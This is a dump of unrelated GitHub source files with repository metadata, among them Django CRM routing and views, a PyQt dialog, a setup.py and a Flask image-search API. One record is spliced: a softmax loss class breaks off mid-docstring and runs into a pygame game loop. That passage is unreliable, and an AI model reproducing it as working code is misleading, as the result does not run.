Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView\n\nfrom apps.user_profiles.urls import router_users, router_managers, router_salesmen, router_supports\nfrom apps.crm.urls import router_clients, router_contracts, router_events\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/login/', TokenObtainPairView.as_view(), name='login'),\n path('api/login/refresh/', TokenRefreshView.as_view(), name='refresh-token'),\n path('api/users/', include(router_users.urls)),\n path('api/managers/', include(router_managers.urls)),\n path('api/salesmen/', include(router_salesmen.urls)),\n path('api/supports/', include(router_supports.urls)),\n path('api/clients/', include(router_clients.urls)),\n path('api/clients//contracts/', include(router_contracts.urls)),\n path('api/clients//contracts//events/',\n include(router_events.urls)),\n]\n\nadmin.site.index_title = 'Epic Events CRM'\nadmin.site.site_header = 'Epic Events Admin'\n","repo_name":"Louack/epic-events-crm","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29614842820","text":"from functions import softmax\nimport numpy as np\n\n\nclass SoftmaxCrossEntropyLoss:\n def __init__(self):\n \"\"\"\n softmax layer with cross entropy loss\n \"\"\"\n self.cache = None\n self.params = []\n self.grads = []\n pass\n\n def forward(self, o, y):\n \"\"\"\n :param o: model output, shape (N, O)\n :param y: true label, shape (N,), where 0<=y[i] 400:\r\n instaciaInimigo()\r\n #instaciaInimigo([0,0],[800,600])\r\n contador=0\r\n\r\n else:\r\n contador+=1\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n exit()\r\n\r\n comando = pygame.key.get_pressed()\r\n if comando[pygame.K_RIGHT]:\r\n pygame.draw.circle(janela, (0, 0, 0), (player.posi[0], player.posi[1]), 50)\r\n player.posi[0] += 1\r\n\r\n if comando[pygame.K_LEFT]:\r\n pygame.draw.circle(janela, (0, 0, 0), (player.posi[0], player.posi[1]), 50)\r\n player.posi[0] -= 1\r\n\r\n if comando[pygame.K_UP]:\r\n pygame.draw.circle(janela, (0, 0, 0), (player.posi[0], player.posi[1]), 50)\r\n player.posi[1] -= 1\r\n\r\n if comando[pygame.K_DOWN]:\r\n pygame.draw.circle(janela, (0, 0, 0), (player.posi[0], player.posi[1]), 50)\r\n player.posi[1] += 1\r\n\r\n if delay > 100:\r\n moveInimigos()\r\n delay=0\r\n\r\n else:\r\n delay+=1\r\n\r\n moveInimigos()\r\n UI()\r\n\r\n pygame.draw.circle(janela, (255,0,0),(player.posi[0], player.posi[1]),50)\r\n pygame.display.update()","repo_name":"joaovbach/bolinhaPy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28010575330","text":"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom .samoloty import*\n\n\nclass menu_samoloty(object):\n def __init__(self,system):\n self.system=system\n\n def setupUi(self, Dialog):\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"modules/ikony/plane.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n Dialog.setWindowIcon(icon)\n Dialog.setObjectName(\"Dialog\")\n Dialog.resize(800, 600)\n Dialog.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)\n self.verticalLayout.setContentsMargins(0, 0, 
0, 0)\n self.verticalLayout.setSpacing(0)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.frame_2 = QtWidgets.QFrame(Dialog)\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_2.setObjectName(\"frame_2\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame_2)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.label = QtWidgets.QLabel(self.frame_2)\n self.label.setMaximumSize(QtCore.QSize(200, 16777215))\n self.label.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.label.setObjectName(\"label\")\n self.verticalLayout_2.addWidget(self.label)\n self.verticalLayout.addWidget(self.frame_2)\n self.frame = QtWidgets.QFrame(Dialog)\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.comboBox = QtWidgets.QComboBox(self.frame)\n self.comboBox.setMinimumSize(QtCore.QSize(200, 0))\n self.comboBox.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.comboBox.setObjectName(\"comboBox\")\n\n self.comboBox.addItem(\"Regionalny\")\n self.comboBox.addItem(\"Szerokokadlubowy\")\n self.comboBox.addItem(\"Woskokadlubowy\")\n\n\n self.horizontalLayout.addWidget(self.comboBox)\n self.pushButton = QtWidgets.QPushButton(self.frame)\n self.pushButton.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.pushButton.setObjectName(\"pushButton\")\n\n self.pushButton.clicked.connect(Dialog.close)\n\n self.horizontalLayout.addWidget(self.pushButton)\n self.pushButton_2 = QtWidgets.QPushButton(self.frame)\n self.pushButton_2.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.pushButton_2.setObjectName(\"pushButton_2\")\n\n self.pushButton_2.clicked.connect(self.dodaj_samolot)\n self.pushButton_2.clicked.connect(Dialog.close)\n\n self.horizontalLayout.addWidget(self.pushButton_2)\n self.verticalLayout.addWidget(self.frame)\n self.frame_3 = QtWidgets.QFrame(Dialog)\n self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_3.setObjectName(\"frame_3\")\n self.verticalLayout.addWidget(self.frame_3)\n\n self.retranslateUi(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dodawanie samolotu\"))\n self.label.setText(_translate(\"Dialog\", \"
Wybierz samolot
    \"))\n self.pushButton.setText(_translate(\"Dialog\", \"anuluj\"))\n self.pushButton_2.setText(_translate(\"Dialog\", \"dodaj\"))\n\n def dodaj_samolot(self):\n samolot=self.comboBox.currentText()\n if samolot == \"Regionalny\":\n self.system.dodaj_samolot(Regionalny())\n elif samolot == \"Szerokokadlubowy\":\n self.system.dodaj_samolot(Szerokokadlubowy())\n elif samolot == \"Woskokadlubowy\":\n self.system.dodaj_samolot(Waskokadlubowy())\n\n\n\n\n\n\n","repo_name":"Bluefish5/Database-Airplane-System","sub_path":"modules/menu_samoloty.py","file_name":"menu_samoloty.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34256462029","text":"import os\n\nimport localizationpy.mapping as mp\nimport localizationpy.file_manager as fm\n\npoints_number = 100\nx_min = 0.1\nx_max = 20.5\ny_min = 0.1\ny_max = 7.8\nz_min = 1.5\nz_max = 1.5\n\ncube = mp.VectorShape(x_min, x_max, y_min, y_max, z_min, z_max)\n\ngen_rand_points = mp.get_random_points(points_number, cube)\n\nfile_path = os.path.abspath(\"output/100_rand_points.dat\")\nfm.create_points_file(file_path, gen_rand_points)\n","repo_name":"Aportillog/room-location","sub_path":"sample/generate_100_rand_points.py","file_name":"generate_100_rand_points.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35141028101","text":"initial = final = s[0]\n\n#Python has the advantage to compare the characters without comparing their ASCII values, ex: 'a' > 'b' would return False\n\nfor i in range(1, len(s)):\n if s[i] >= initial[-1]:\n initial += s[i]\n if len(initial) > len(final):\n final = initial\n else:\n initial = s[i]\n\nprint('Longest substring in alphabetical order is:', final)\n","repo_name":"Nazaf/MIT-6.00.1","sub_path":"AlphabeticalLongestSubstring.py","file_name":"AlphabeticalLongestSubstring.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22558332514","text":"#!/usr/bin/env python3\n\nimport os\nimport re\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\nfrom setuptools.command.build_py import build_py as BuildCommand\n\ndef read(fname):\n with open(os.path.join(os.path.dirname(__file__), fname)) as fildes:\n return fildes.read()\n\nclass NoseTestCommand(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n # Run nose ensuring that argv simulates running nosetests directly\n import nose\n nose.run_exit(argv=['nosetests'])\n\nclass BuildWithVersionCommand(BuildCommand):\n def run(self):\n BuildCommand.run(self)\n if not self.dry_run:\n version_fname = os.path.join(self.build_lib, 'vhdeps', 'version.py')\n with open(version_fname, 'w') as fildes:\n fildes.write('__version__ = \"\"\"' + self.distribution.metadata.version + '\"\"\"\\n')\n\nsetup(\n name = 'vhdeps',\n version_config={\n 'version_format': '{tag}+{sha}',\n 'starting_version': '0.0.1'\n },\n author = 'Jeroen van Straten',\n author_email = 'j.vanstraten-1@tudelft.nl',\n description = (\n 'VHDL dependency analyzer and simulation driver.'\n ),\n license = 'Apache',\n keywords = 'vhdl dependency analyzer simulation',\n url = 'https://github.com/abs-tudelft/vhdeps',\n long_description = read('README.md'),\n long_description_content_type = 
'text/markdown',\n classifiers = [\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3',\n ],\n project_urls = {\n 'Source': 'https://github.com/abs-tudelft/vhdeps',\n },\n packages = ['vhdeps', 'vhdeps.targets'],\n entry_points = {'console_scripts': ['vhdeps=vhdeps:run_cli']},\n python_requires = '>=3',\n install_requires = [\n 'plumbum',\n 'lcov_cobertura',\n ],\n setup_requires = [\n 'better-setuptools-git-version',\n 'setuptools-lint',\n 'pylint',\n ],\n tests_require = [\n 'nose',\n 'coverage',\n 'lcov_cobertura',\n ],\n cmdclass = {\n 'test': NoseTestCommand,\n 'build_py': BuildWithVersionCommand,\n },\n)\n","repo_name":"abs-tudelft/vhdeps","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"31"} +{"seq_id":"10350851586","text":"from django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import generics, status\nfrom back.models import Project, Activity\nfrom back.serializers import ProjectSerializer, ProjectListSerializer\nfrom back.services import (\n ProjectEmailNotificationService as mail_service,\n PredefinedDocHandlingService,\n)\n\n\nclass ProjectList(generics.ListAPIView):\n serializer_class = ProjectListSerializer\n\n def get_queryset(self):\n user = self.request.user\n if user.role == \"Contr\":\n return Project.objects.filter(\n # company=user.company,\n contractor=user,\n deleted=False,\n )\n return Project.objects.filter(company=user.company, deleted=False)\n\n\nclass ProjectCreate(generics.CreateAPIView):\n queryset = Project.objects.all()\n serializer_class = ProjectSerializer\n\n def create(self, request, *args, **kwargs):\n res = super(ProjectCreate, self).create(request, args, kwargs)\n project = Project.objects.get(pk=res.data[\"id\"])\n activity = Activity(\n project=project, author=request.user, company=project.company\n )\n activity.project_created_message()\n email = mail_service(project=project, receivers=[project.contractor])\n email.send_project_created()\n\n PredefinedDocHandlingService(project=project).create_documents()\n\n return res\n\n\nclass ProjectDetail(generics.RetrieveUpdateDestroyAPIView):\n serializer_class = ProjectSerializer\n\n def get_queryset(self):\n user = self.request.user\n if user.role == \"Contr\":\n return Project.objects.filter(contractor__pk=user.pk, deleted=False)\n return Project.objects.filter(company=user.company, deleted=False)\n\n def patch(self, request, *args, **kwargs):\n\n if kwargs[\"pk\"]:\n prev_project = Project.objects.get(pk=kwargs[\"pk\"])\n\n res = super(ProjectDetail, self).patch(request, args, kwargs)\n project = Project.objects.get(pk=res.data[\"id\"])\n if prev_project.status != project.status:\n activity = Activity(\n project=project, author=request.user, company=project.company\n )\n activity.project_status_updated_message(project.status)\n mail = mail_service(project=project, receivers=[project.contractor])\n mail.send_project_updated()\n if project.status == \"Closed\":\n project.permits.update(active=False)\n return res\n\n def destroy(self, request, pk):\n queryset = self.get_queryset()\n project = get_object_or_404(queryset, pk=pk)\n project.deleted = True\n project.save()\n return JsonResponse(\n data={\"response\": f\"project {project.name} deleted.\"},\n 
status=status.HTTP_204_NO_CONTENT,\n )\n","repo_name":"Vasyl82/FOX","sub_path":"back/views/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9620317610","text":"from flask import Blueprint, g, request, jsonify, escape\nfrom ..extensions import (\n auth, limiter, handleApiPermission, cache, record\n)\nimport json\nfrom PIL import Image\nimport imagehash\nfrom tempfile import TemporaryDirectory\nfrom base64 import b64encode\nfrom uuid import uuid4\nimport os.path\nfrom imghdr import what as what_img\nfrom imghdr import tests\n\nALLOWED_EXTENSIONS = [\"gif\", \"png\", \"jpg\", \"jpeg\", \"webp\"]\n\nJPEG_MARK = b'\\xff\\xd8\\xff\\xdb\\x00C\\x00\\x08\\x06\\x06' \\\n b'\\x07\\x06\\x05\\x08\\x07\\x07\\x07\\t\\t\\x08\\n' \\\n b'\\x0c\\x14\\r\\x0c\\x0b\\x0b\\x0c\\x19\\x12\\x13\\x0f'\n\n\ndef test_jpeg(h, f):\n \"\"\"JPEG data in JFIF format\"\"\"\n if b'JFIF' in h[:23]:\n return 'jpeg'\n \"\"\"JPEG with small header\"\"\"\n if len(h) >= 32 and 67 == h[5] and h[:32] == JPEG_MARK:\n return 'jpeg'\n \"\"\"JPEG data in JFIF or Exif format\"\"\"\n if h[6:10] in (b'JFIF', b'Exif') or h[:2] == b'\\xff\\xd8':\n return 'jpeg'\n\n\ntests.append(test_jpeg)\n\n\ndef isNotAllowedFile(filename):\n if filename == \"\"\\\n or '.' not in filename\\\n or (filename.rsplit('.', 1)[1].lower()\n not in ALLOWED_EXTENSIONS):\n return True\n return False\n\n\ndef getMylistCountDict(illustIDs):\n illustKey = \",\".join([str(i) for i in illustIDs])\n mylistData = {\n i[0]: i[1]\n for i in g.db.get(\n f\"\"\"SELECT illustID, COUNT(mylistID) FROM data_mylist\n GROUP BY illustID\n HAVING illustID IN ({illustKey})\"\"\"\n )\n }\n mylistDict = {\n str(i): mylistData[i]\n if i in mylistData else 0\n for i in illustIDs\n }\n return mylistDict\n\n\ndef getMylistedDict(illustIDs):\n illustKey = \",\".join([str(i) for i in illustIDs])\n mylistedData = g.db.get(\n f\"\"\"SELECT illustID FROM data_mylist\n WHERE mylistID IN\n (SELECT mylistID FROM info_mylist WHERE userID={g.userID})\n AND illustID IN ({illustKey})\"\"\"\n )\n mylistedData = [i[0] for i in mylistedData]\n mylistedDict = {\n str(i): True if i in mylistedData else False\n for i in illustIDs\n }\n return mylistedDict\n\n\ndef getSearchCountResult(whereSql, placeholder=()):\n illustCount = g.db.get(\n f\"\"\"SELECT COUNT(DISTINCT illustID) FROM data_illust\n WHERE {whereSql}\"\"\",\n placeholder\n )\n return illustCount[0][0]\n\n\ndef getSearchResult(whereSql, illustCount, resultTitle, placeholder=()):\n per_page = 20\n pageID = request.args.get('page', default=1, type=int)\n if pageID < 1:\n pageID = 1\n sortMethod = request.args.get('sort', default=\"d\", type=str)\n sortMethod = \"illustDate\" if sortMethod == \"d\" else \"illustLike\"\n order = request.args.get('order', default=\"d\", type=str)\n order = \"DESC\" if order == \"d\" else \"ASC\"\n pages, extra_page = divmod(illustCount, per_page)\n if extra_page > 0:\n pages += 1\n illusts = g.db.get(\n f\"\"\"SELECT illustID,data_illust.artistID,illustName,illustDescription,\n illustDate,illustPage,illustLike,\n illustOriginUrl,illustOriginSite,illustNsfw,artistName,\n illustExtension,illustStatus\n FROM data_illust INNER JOIN info_artist\n ON data_illust.artistID = info_artist.artistID\n WHERE {whereSql}\n AND illustStatus=0\n ORDER BY {sortMethod} {order}\n LIMIT {per_page} OFFSET {per_page * (pageID - 1)}\"\"\",\n placeholder\n )\n # ないとページ番号が不正なときに爆発する\n if not len(illusts):\n 
return jsonify(\n status=200,\n message=\"not found\",\n data={\n \"title\": resultTitle,\n \"count\": illustCount,\n \"current\": pageID,\n \"pages\": pages,\n \"imgs\": []\n }\n )\n illustIDs = [i[0] for i in illusts]\n # マイリストされた回数を気合で取ってくる\n mylistDict = getMylistCountDict(illustIDs)\n # 自分がマイリストしたかどうかを気合で取ってくる\n mylistedDict = getMylistedDict(illustIDs)\n return jsonify(\n status=200,\n message=\"found\",\n data={\n \"title\": resultTitle,\n \"count\": illustCount,\n \"current\": pageID,\n \"pages\": pages,\n \"imgs\": [{\n \"illustID\": i[0],\n \"artistID\": i[1],\n \"title\": i[2],\n \"caption\": i[3],\n \"date\": i[4].strftime('%Y-%m-%d %H:%M:%S'),\n \"pages\": i[5],\n \"like\": i[6],\n \"mylist\": mylistDict[str(i[0])],\n \"mylisted\": mylistedDict[str(i[0])],\n \"originUrl\": i[7],\n \"originService\": i[8],\n \"nsfw\": i[9],\n \"artist\": {\n \"name\": i[10]\n },\n \"extension\": i[11]\n } for i in illusts]\n }\n )\n\n\ndef getSearch(whereSql, resultTitle, placeholder=()):\n illustCount = getSearchCountResult(whereSql, placeholder)\n if illustCount == 0:\n return jsonify(status=404, message=\"No matched illusts.\")\n return getSearchResult(whereSql, illustCount, resultTitle, placeholder)\n\n\nsearch_api = Blueprint('search_api', __name__)\n\n#\n# 検索結果画面 関連 (キーワード/タグ/作者/キャラ/画像 とかは全部パラメータで取る)\n#\n\n\n@search_api.route(\"/tag\", methods=[\"GET\"])\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByTag():\n tagID = request.args.get('id', default=None, type=int)\n if not tagID:\n return jsonify(status=400, message=\"tagID is required.\")\n tagName = g.db.get(\n \"SELECT tagName FROM info_tag WHERE tagID = %s\",\n (tagID,)\n )\n if not tagName:\n return jsonify(status=404, message=\"The tag was not found\")\n whereSql = f\"\"\"illustID IN\n (SELECT illustID FROM data_tag WHERE tagID={tagID})\"\"\"\n return getSearch(whereSql, tagName[0][0])\n\n\n@search_api.route(\"/artist\", methods=[\"GET\"])\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByArtist():\n artistID = request.args.get('id', default=None, type=int)\n if not artistID:\n return jsonify(status=400, message=\"artistID is required.\")\n artistName = g.db.get(\n \"SELECT artistName FROM info_artist WHERE artistID = %s\",\n (artistID,)\n )\n if not artistName:\n return jsonify(status=404, message=\"The artist was not found\")\n whereSql = f\"data_illust.artistID = {artistID}\"\n return getSearch(whereSql, artistName[0][0])\n\n\n@search_api.route(\"/uploader\", methods=[\"GET\"])\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByUploader():\n uploaderID = request.args.get('id', default=None, type=int)\n if not uploaderID:\n return jsonify(status=400, message=\"uploaderID is required.\")\n uploaderName = g.db.get(\n \"SELECT userName FROM data_user WHERE userID = %s\",\n (uploaderID,)\n )\n if not uploaderName:\n return jsonify(status=404, message=\"The user was not found\")\n whereSql = f\"data_illust.userID = {uploaderID}\"\n return getSearch(whereSql, uploaderName[0][0])\n\n\n@search_api.route(\"/character\", methods=[\"GET\"])\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByCharacter():\n charaID = request.args.get('id', default=None, type=int)\n if not charaID:\n return jsonify(status=400, message=\"charaID is required.\")\n charaName = g.db.get(\n \"SELECT 
tagName FROM info_tag WHERE tagID = %s\",\n (charaID,)\n )\n if not charaName:\n return jsonify(status=404, message=\"The chara was not found\")\n whereSql = f\"\"\"illustID IN\n (SELECT illustID FROM data_tag WHERE tagID={charaID})\"\"\"\n return getSearch(whereSql, charaName[0][0])\n\n\n@search_api.route(\"/keyword\", methods=[\"GET\"])\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByKeyword():\n keyword = request.args.get(\"keyword\", default=None, type=str)\n if not keyword:\n return jsonify(status=400, message=\"keyword is required.\")\n whereSql = \"illustName LIKE %s\"\n return getSearch(whereSql, keyword, (\"%\"+keyword+\"%\",))\n\n\n@search_api.route('/all', methods=[\"GET\"], strict_slashes=False)\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByAll():\n whereSql = \"1 = 1\"\n return getSearch(whereSql, \"全て\")\n\n\n@search_api.route('/random', methods=[\"GET\"], strict_slashes=False)\n@auth.login_required\n@limiter.limit(handleApiPermission)\ndef searchByRandom():\n '''\n REQ\n nsfw= 1/0\n artistID=NUMBER\n tagID=NUMBER\n charaID=NUMBER\n '''\n acceptNsfw = request.args.get('nsfw', default=0, type=int)\n artistID = request.args.get('artistID', default=0, type=int)\n tagID = request.args.get('tagID', default=0, type=int)\n charaID = request.args.get('charaID', default=0, type=int)\n count = request.args.get('count', default=1, type=int)\n acceptNsfw = 1 if acceptNsfw else 0\n count = 10 if count > 10 else count\n # 完全ランダム\n if (not artistID) and (not tagID) and (not charaID):\n illusts = g.db.get(\n f\"\"\"SELECT illustID, data_illust.artistID,\n illustName, illustDescription,\n illustDate, illustPage, illustLike, illustOriginUrl,\n illustOriginSite, illustNsfw, artistName,\n illustExtension,illustStatus\n FROM `data_illust` INNER JOIN info_artist\n ON info_artist.artistID = data_illust.artistID\n WHERE illustNsfw={acceptNsfw} AND illustStatus=0\n ORDER BY RAND() LIMIT {count}\"\"\"\n )\n # 作者指定ランダム\n elif artistID:\n illusts = g.db.get(\n f\"\"\"SELECT illustID, data_illust.artistID,\n illustName, illustDescription,\n illustDate, illustPage, illustLike, illustOriginUrl,\n illustOriginSite, illustNsfw, artistName,\n illustExtension, illustStatus\n FROM `data_illust` INNER JOIN info_artist\n ON info_artist.artistID = data_illust.artistID\n WHERE illustNsfw={acceptNsfw}\n AND data_illust.artistID={artistID}\n AND illustStatus=0\n ORDER BY RAND() LIMIT {count}\"\"\"\n )\n # タグ指定ランダム\n # キャラ指定ランダム\n else:\n # つまりタグIDなので握りつぶす\n if charaID:\n tagID = charaID\n illusts = g.db.get(\n f\"\"\"SELECT illustID, data_illust.artistID,\n illustName, illustDescription,\n illustDate, illustPage, illustLike, illustOriginUrl,\n illustOriginSite, illustNsfw, artistName,\n illustExtension, illustStatus\n FROM `data_illust` INNER JOIN info_artist\n ON info_artist.artistID = data_illust.artistID\n WHERE illustID IN\n (SELECT illustID FROM data_tag WHERE tagID={tagID})\n AND illustStatus=0\n AND illustNsfw={acceptNsfw} ORDER BY RAND() LIMIT {count}\"\"\"\n )\n if not illusts:\n return jsonify(\n status=200,\n message=\"not found\",\n data={\n \"imgs\": []\n }\n )\n illustIDs = [i[0] for i in illusts]\n # マイリストされた回数を気合で取ってくる\n mylistDict = getMylistCountDict(illustIDs)\n return jsonify(\n status=200,\n message=\"found\",\n data={\n \"imgs\": [{\n \"illustID\": illust[0],\n \"artistID\": illust[1],\n \"title\": illust[2],\n \"caption\": illust[3],\n \"date\": 
illust[4],\n \"pages\": illust[5],\n \"like\": illust[6],\n \"mylist\": mylistDict[str(illust[0])],\n \"originUrl\": illust[7],\n \"originService\": illust[8],\n \"nsfw\": illust[9],\n \"artist\": {\n \"name\": illust[10]\n },\n \"extension\": illust[11]\n } for illust in illusts]\n }\n )\n\n\n@search_api.route('/image', methods=[\"POST\"], strict_slashes=False)\n@auth.login_required\n@limiter.limit(handleApiPermission)\ndef searchByImage():\n if g.userPermission not in [0, 9]:\n return jsonify(status=400, message=\"Bad request\")\n if \"file\" not in request.files:\n return jsonify(status=400, message=\"File must be included\")\n file = request.files['file']\n # ファイル拡張子確認\n if isNotAllowedFile(file.filename):\n return jsonify(status=400, message=\"The file is not allowed\")\n with TemporaryDirectory() as temp_path:\n # 画像を一旦保存して確認\n uniqueID = str(uuid4()).replace(\"-\", \"\")\n uniqueID = b64encode(uniqueID.encode(\"utf8\")).decode(\"utf8\")[:-1]\n tempPath = os.path.join(temp_path, uniqueID)\n file.save(tempPath)\n fileExt = what_img(tempPath)\n if not fileExt:\n return jsonify(status=400, message=\"The file is not allowed\")\n # 大丈夫そうなのでハッシュ値を作成して検索\n hash = int(str(imagehash.phash(Image.open(tempPath))), 16)\n # 検索SQL\n illusts = g.db.get(\n f\"\"\"SELECT illustID, data_illust.artistID,\n BIT_COUNT(illustHash ^ %s) AS SAME,\n illustName, illustDescription, illustDate, illustPage, illustLike,\n illustOriginUrl, illustOriginSite, illustNsfw, artistName,\n illustExtension,illustStatus\n FROM `data_illust`\n INNER JOIN info_artist\n ON info_artist.artistID = data_illust.artistID\n HAVING SAME < 5 AND illustStatus=0 ORDER BY SAME DESC LIMIT 10\"\"\",\n (hash,)\n )\n if len(illusts):\n illustIDs = [i[0] for i in illusts]\n # マイリストされた回数を気合で取ってくる\n mylistDict = getMylistCountDict(illustIDs)\n # 自分がマイリストしたかどうかを気合で取ってくる\n mylistedDict = getMylistedDict(illustIDs)\n illusts = [{\n \"illustID\": i[0],\n \"artistID\": i[1],\n \"similarity\": i[2],\n \"title\": i[3],\n \"caption\": i[4],\n \"date\": i[5].strftime('%Y-%m-%d %H:%M:%S'),\n \"pages\": i[6],\n \"like\": i[7],\n \"mylist\": mylistDict[str(i[0])],\n \"mylisted\": mylistedDict[str(i[0])],\n \"originUrl\": i[8],\n \"originService\": i[9],\n \"nsfw\": i[10],\n \"artist\": {\n \"name\": i[11]\n },\n \"extension\": i[12]\n } for i in illusts]\n else:\n illusts = []\n # データベースから検索\n return jsonify(\n status=200,\n message='ok',\n data={\n 'hash': str(hash),\n 'illusts': illusts\n }\n )\n\n#\n# 高度な検索(複数タグ等)\n#\n\n# 複数条件での検索処理\n# 1. まずキーワードからタグ一覧を取ってくる(tags/find から取ってくる)\n# 2. タグ一覧を tagIdsとして渡して 応答に返ってくるイラストIDを取得する\n# (TODO:search系列と同様の動作をするように修正)\n\n# OR検索の例\n# SELECT illustID,tagID FROM `data_tag` WHERE tagID IN (1,2,3)\n#\n# AND検索の例\n# SELECT illustID,tagID FROM `data_tag` GROUP BY illustID\n# HAVING SUM(tagID='1') AND SUM(tagID='2')\n# または\n# SELECT illustID FROM テーブル WHERE tagID=? 
AND illustID\n# IN (それまでに取得したillustIDリスト)\n# を forで回せばいい\n\n\n@search_api.route(\"/multiple/tag\", methods=[\"GET\"])\n@auth.login_required\n@limiter.limit(handleApiPermission)\n@cache.cached(timeout=7, query_string=True)\ndef searchByMultipleTag():\n # パラメータの確認\n tagID = request.args.get('id', default=None, type=str)\n if not tagID:\n return jsonify(status=400, message=\"tagID is required.\")\n # あんまり長いと負荷がかかりそうなので制限\n tagID = [str(int(t)) for t in tagID.split(',') if t.isdigit()]\n tagID = tagID[:5] if len(tagID) > 5 else tagID\n filterHaving = ' AND '.join([f\"SUM(tagID='{t}')\" for t in tagID])\n # カウント取得\n baseWhere = f\"\"\"\n (SELECT illustID FROM data_tag GROUP BY illustID HAVING {filterHaving})\n \"\"\"\n illustCount = g.db.get(f\"SELECT COUNT(illustID) FROM {baseWhere} AS T1\")\n if not illustCount:\n return jsonify(status=404, message=\"No matched illusts.\")\n # タグ名取得\n tagName = g.db.get(\n f\"SELECT tagName FROM info_tag WHERE tagID In ({','.join(tagID)})\"\n )\n tagName = \" \".join([t[0] for t in tagName])\n # 検索結果取得\n whereSql = f\"illustID IN {baseWhere}\"\n return getSearchResult(whereSql, illustCount[0][0], tagName)\n","repo_name":"nuxt-image-board/backend","sub_path":"api/blueprints/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":17130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"35174389479","text":"class Solution:\n def checkStraightLine(self, coordinates: List[List[int]]) -> bool:\n x0 = coordinates[0][0]\n y0 = coordinates[0][1]\n x1 = coordinates[1][0]\n y1 = coordinates[1][1]\n \n if x1 - x0 is not 0:\n dxdy0 = (y1 - y0)/(x1 - x0)\n else:\n dxdy0 = -1\n for x, y in coordinates[2:]:\n dx = x - x0\n dy = y - y0\n if dx is not 0:\n dydx = dy/dx\n else:\n dydx = -1\n \n if dydx != dxdy0:\n return False\n \n return True\n","repo_name":"JuneKim/algorithm","sub_path":"ProblemSolving/LeetCode/1232_CheckIfItIsAStraightLine.py","file_name":"1232_CheckIfItIsAStraightLine.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28009835405","text":"'''\n\nhttps://github.com/beir-cellar/beir/blob/main/examples/retrieval/training/train_sbert.py\n\nThis examples show how to train a basic Bi-Encoder for any BEIR dataset without any mined hard negatives or triplets.\nThe queries and passages are passed independently to the transformer network to produce fixed sized embeddings.\nThese embeddings can then be compared using cosine-similarity to find matching passages for a given query.\nFor training, we use MultipleNegativesRankingLoss. There, we pass pairs in the format:\n(query, positive_passage). 
